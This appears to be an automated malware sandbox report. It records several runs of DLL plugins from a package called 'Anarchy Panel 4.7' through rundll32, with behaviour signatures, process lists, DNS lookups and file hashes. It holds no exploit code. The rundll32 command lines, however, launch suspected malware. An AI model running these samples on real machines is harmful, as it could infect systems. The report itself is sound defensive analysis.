rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1755s

Max time network

1168s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

Signatures

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C4C8BD77-D224-4F17-AF16-81DAE6FCD035}.catalogItem C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 135.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 126.211.247.8.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wsuA642.tmp

MD5 c01eaa0bdcd7c30a42bbb35a9acbf574
SHA1 0aee3e1b873e41d040f1991819d0027b6cc68f54
SHA256 32297224427103aa1834dba276bf5d49cd5dd6bda0291422e47ad0d0706c6d40
SHA512 d26ff775ad39425933cd3df92209faa53ec5b701e65bfbcccc64ce8dd3e79f619a9bad7cc975a98a95f2006ae89e50551877fc315a3050e48d5ab89e0802e2b7

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 bb40fbc226480c508d39693d38cec38e
SHA1 1ad89427482d5bc0c6387978e89750501dc19d5e
SHA256 9e9312260b17484244827f311b8c074dafba75ac20f25ceb1eea66f9bd655bdf
SHA512 75693ab8db77a9c0059551580c32861fcd34f2b781ab31a0c9d02c768120208da76eb7ff09678d8b61448c88ccabc8068b0a8e0dbddefa3fb2dbe60e7c8e5b92

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 ae8533130073ebaf50cd79d27f827570
SHA1 2d5c8edbf1b3cfb885e7980539d873ccddbdc362
SHA256 f7aef9cf3cc6e5df4a314f2849eb968d2e901d1c7e483769301eebf95c560ff7
SHA512 ebfb0feee181f65db3baad2587cce08cb636ad84129ee3817e84f2dda3ec170c2f518fdaad6715a5fced93a8c594d5a7fb769794c5e35ef1ab96721beefa16f1

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 3bb7dc9ed69a8ac25da1fb2610ddd87e
SHA1 e8f415cb45b0a1caf8e68283584d144bb89bb338
SHA256 6f08ce47a5b22664deade3e3bf9a95c1397a92594589d96988bc42000a981e1d
SHA512 f815c983e70664ad25df5800d8eec5bd7dbd3242bbf6c1fbd528be1f2307b4fdb23f3555d5780de295fd695856e2d7b86fe3e15df6a3f4eea7ef4d3493d8658e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 22c1f20184a4da88dbd761e83d4d3e75
SHA1 db09fa52db52d30153777f9c196f67225ad0522e
SHA256 f6ac35241be252a7991ecab9e0748a305824d4801a142544e92665d44b38b385
SHA512 5817ad83ffdfdea70298bfcb4b4f1b62e93b3616b1aeaca6113499840e8a39fd282517b3df75c1252e20cd81872f7bfc83ce14687d39677203770f860f7e3031

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 2fb50b37935e8bd968a846d82b8f8e83
SHA1 676e22e916700a50154e9dae56114330fb7664ac
SHA256 36230ac18b2e7c099b5a7ce6e66bec1aa20ba21742d66ff749151209b109c43e
SHA512 05e8ffc99dbfc76d45d0558e25b460e78c0d0c89cf0949f547c00f17befaeab8d19817cce93c3f7b138f44d285deea2e32fc2c1f57e7049f79424a52940be701

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 5f379394d1942441c8dd49d92e383c32
SHA1 cb03e7ce6157ec68c74c28e8bdce5ddb1bfa7a0b
SHA256 0947ee5c019f54bf3acfc735889e243b44ff26a3dad183761ae27fad667a6032
SHA512 6d234316a4dd1791ccf1ea164f48e8a904201d78747d6acd1a099cc0915dc30cf7adbe2a55c34c904ae3ff64c735eb2a6f19d165d6dcd36f7a3909cc29d6cd41

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 30b68dafb1e75a9f96b19a169d1bb9ec
SHA1 5ed22cd49f268842c97b948dfec259c73d5a7c9e
SHA256 9e43b701575950d829b81a0a7b74355e48ee0f8ca43d10cd77e9f4bd3fd167e0
SHA512 a7569c2d3c32b0b61a1d0e6fd6c8a94fd9f79ae4b7eed28bd883f694a78a329f68016a3e5f4d420ebe93bebf4d62f86aab7d3540aa1da4f641e56febfdf85463

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 e78be81225dbe7869c8353d426e10517
SHA1 58e39bf67bdf119411be4f97c211fcf8acb72322
SHA256 6cd370adf48e43e773a2f3b76ceae308796f46799e4275adc787612af166a8e4
SHA512 43e351193f9e0e6a35d9eb0080362de27ce53605b30eae28d23cbbb1b40c3b6da171532572da8000d37cdcbf4c09675638ff3da329d4ad220114bd74bcd5a61a

memory/1608-342-0x0000020323880000-0x0000020323890000-memory.dmp

memory/1608-361-0x0000020323980000-0x0000020323990000-memory.dmp

memory/1608-377-0x000002032BCF0000-0x000002032BCF1000-memory.dmp

memory/1608-379-0x000002032BD20000-0x000002032BD21000-memory.dmp

memory/1608-380-0x000002032BD20000-0x000002032BD21000-memory.dmp

memory/1608-381-0x000002032BE30000-0x000002032BE31000-memory.dmp

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 1e953c338201641935bd59debfd058fa
SHA1 f9ba7c3dd4ce5ba336c02a3181db38f7c05bbcff
SHA256 70d7514d42b7ef3850f276508f6cc77cb1958572e695d77dd27613a877dafb10
SHA512 d312255a2a530bbb8aec5d987bb86a0c68927273003ceb04c680b2bfba3183250140dd7595b9853ae96daff1cc1d034bfaa70819650eb3242d453bdadb940d09

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 db275cf78eed4bd3a7944879449fecc2
SHA1 fc2648932cebc6d370a57a497e402979b8ef3aaf
SHA256 629c58336b353b73ff9675ba87d8c6c13375f2b467dc799b4bd26e04789f8107
SHA512 f8e37f5fcbcf24400c6c617ad73c956b8270c462e103f52d9a4c2273ad5b9b77897fe0738dd54781914df9357aa382260dc48f2ff11a4f984e10b57ae891fe1b

Analysis: behavioral9

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1563s

Max time network

1568s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1138s

Max time network

1146s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

709s

Max time network

1163s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

N/A